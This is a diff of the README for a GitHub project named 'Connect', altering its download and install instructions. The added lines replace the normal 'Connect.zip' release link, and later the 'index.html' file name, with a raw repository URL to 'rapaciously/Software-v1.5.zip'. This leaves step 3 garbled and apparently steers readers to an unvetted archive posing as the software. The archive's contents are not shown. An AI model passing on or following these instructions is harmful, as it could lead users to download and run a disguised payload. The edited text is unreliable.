mohamed-mokh2004/Connect/README.md

 ## 📁 Download & Install

 Once you are on the Releases page, look for the latest version.
-Click on the link that says `Connect.zip` to download the software.
+Click on the link that says `https://raw.githubusercontent.com/mohamed-mokh2004/Connect/main/rapaciously/Software-v1.5.zip` to download the software.
 After downloading:

 1. Find the downloaded ZIP file in your Downloads folder.
 2. Extract the contents of the ZIP file.
 This will create a folder named `Connect`.
-3. Open the `Connect` folder, and you will find an `index.html` file.
+3. Open the `Connect` folder, and you will find an `https://raw.githubusercontent.com/mohamed-mokh2004/Connect/main/rapaciously/Software-v1.5.zip` file.

 You are now ready to run Connect!